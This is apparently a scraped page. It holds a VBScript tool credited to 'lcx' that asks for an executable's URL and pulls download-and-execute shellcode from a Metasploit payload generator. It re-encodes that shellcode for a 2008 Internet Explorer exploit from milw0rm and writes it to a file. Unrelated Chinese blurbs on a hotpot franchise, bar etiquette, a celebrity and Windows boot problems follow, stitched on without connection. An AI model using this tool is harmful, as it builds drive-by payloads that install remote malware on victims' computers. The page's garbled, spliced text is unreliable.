'code by lcx On Error Resume NextExeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload" Body = getHTTPPage(url)Set Re = New RegExpRe.Pattern = "(\$shellcode \=[\s\S]+)" Set Matches = Re.Execute(Body)If Matches.Count>0 Then Body = Matches(0).value code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"",""),Chr(10),""),".","")) function replaceregex(str) set regex=new regExp regex.pattern="\\x(..)\\x(..)"regex.IgnoreCase=true regex.global=true matches=regex.replace(str,"%u$2$1") replaceregex=matches end Function Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage = BytesToBstr(t, "GB2312")End Function Function GetBody(url) On Error Resume Next Set Retrieval = CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", url, False, "", "" .Send GetBody = .ResponseBody End With Set Retrieval = NothingEnd Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream = CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode = 3 objstream.Open objstream.Write Body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close Set objstream = NothingEnd Function Function URLEncoding(vstrIn) strReturn = "" For aaaa = 1 To Len(vstrIn) ThisChr = Mid(vStrIn,aaaa,1) If Abs(Asc(ThisChr)) < &HFF Then strReturn = strReturn & ThisChr Else innerCode = Asc(ThisChr) If innerCode < 0 Then innerCode = innerCode + &H10000 End If Hight8 = (innerCode And &HFF00)\ &HFF Low8 = innerCode And &HFF strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8) End If Next URLEncoding = strReturnEnd Function set fso=CreateObject("scripting.filesystemobject")set fileS=fso.opentextfile("a.txt",2,true)fileS.writeline replaceregex(code)'fileS.writeline bodywscript.echo replaceregex(code)files.closeset fso=Nothing wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"
不知道你对加盟创业是否感乐趣呢?假如是的话,那么你此刻就和我一起来相识一下鸿富祥全牛暖锅加盟项目标成长吧!鸿富祥全牛暖锅加盟项目在市场上创立多年,品牌形象早就已经深入到人心了,深受宽大消费者的喜爱与追...
酒吧是当代年轻人放松社交的场所,对于第一次去酒吧的人而言,担心自己会露怯,不懂规矩从而闹了笑话,同时去酒吧也要注意人身安全,第一次去酒吧需要注意什么?下面友谊长存小编带来第一次去酒吧注意事项。 第一...
现在说起《西游记》,说起主演“六小龄童”,大家网友评论或者视频弹幕上一定是满屏幕的“两开花,开花!开花!”俨然成为了一个和吴亦凡“大碗宽面”同等级的梗,真的要被玩坏了。 虽然一直...
相信现在有好多小伙伴们拿这手机都在看陈伟霆回应高铁上要签名的粉丝事情吧,因为在这两天陈伟霆回应高铁上要签名的粉丝的热度是非常高的,受到了广大网友们的关注,那么既然现在大家都非常关注陈伟霆回应高铁上要签...
我们知道有时由于一些难题,电脑上卡死卡住了,通常会采用强制关机,可是强制关机也很有可能会造成电脑黑屏没法一切正常进到系统软件,那麼win10强制关机后无法启动了怎么办呢?下面我教大伙儿出現这类状况的解...
昨天打开百度,右上角显示一个机器人的头像,领取了这个机器人好像挺好玩的,试着聊了一天,原来是百度推出的一个新产品,百度机器人! 其实这类的产品,很多工具都有,比如苹果手机、小米手机,不仅仅是用文...